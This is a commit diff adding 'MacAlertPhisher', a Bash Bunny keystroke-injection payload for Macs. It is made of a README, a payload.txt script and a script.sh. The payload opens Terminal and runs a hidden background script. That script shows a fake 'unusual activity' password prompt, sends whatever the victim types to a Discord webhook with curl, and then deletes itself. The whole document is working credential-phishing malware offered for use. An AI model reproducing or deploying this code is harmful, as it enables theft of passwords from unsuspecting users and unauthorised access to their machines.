Add MacAlertPhisher

payloads/library/phishing/MacAlertPhisher/README.md

@@ -0,0 +1,20 @@
+# MacAlertPhisher
+* Author: 90N45
+* Version: 1.0
+* Target: Mac
+* Attackmodes: HID, STORAGE
+
+### Description
+Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
+
+### Setup
+Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file.
+
+### Status
+| LED | State |
+| --- | --- |
+| Magenta solid (SETUP) | Set ATTACKMODE |
+| Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine |
+| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) |
+
+*Average runtime: 26 seconds*

payloads/library/phishing/MacAlertPhisher/payload.txt

@@ -0,0 +1,36 @@
+#!/bin/bash
+#
+# Title:         MacAlertPhisher
+# Description:   Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
+# Author:        90N45
+# Version:       1.0
+# Category:      Phishing
+# Attackmodes:   HID, STORAGE
+
+LED SETUP
+ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
+
+LED ATTACK
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 2500
+
+QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh"
+QUACK ENTER
+QUACK DELAY 1000
+
+QUACK STRING "diskutil eject /Volumes/BashBunny/"
+QUACK ENTER
+QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &"
+QUACK ENTER
+QUACK GUI SPACE
+QUACK DELAY 1500
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "killall Terminal"
+QUACK ENTER
+
+LED FINISH

payloads/library/phishing/MacAlertPhisher/script.sh

@@ -0,0 +1,33 @@
+#!/bin/bash
+
+# Discord Webhook Link (NEEDED)
+discord=""
+# The alert's text
+dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human."
+# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon)
+icon="stop"
+# A custom application, that should open the alert (for ex. "Finder")
+app=""
+# Base64 encode the entered string to prevent an injection/syntax error
+base64=false
+
+#### The main script
+
+if [[ ${app} != "" ]]; then
+	pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer')
+elif [[ ${app} == "" ]]; then
+	pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer')
+fi
+
+
+pwd=${pwd#*"button returned:Continue, text returned:"}
+
+if [[ ${base64} == true ]]; then
+	pwd=$(echo $pwd | base64)
+	curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord}
+else
+	curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord}
+fi
+
+# Self destruct
+rm /tmp/script.sh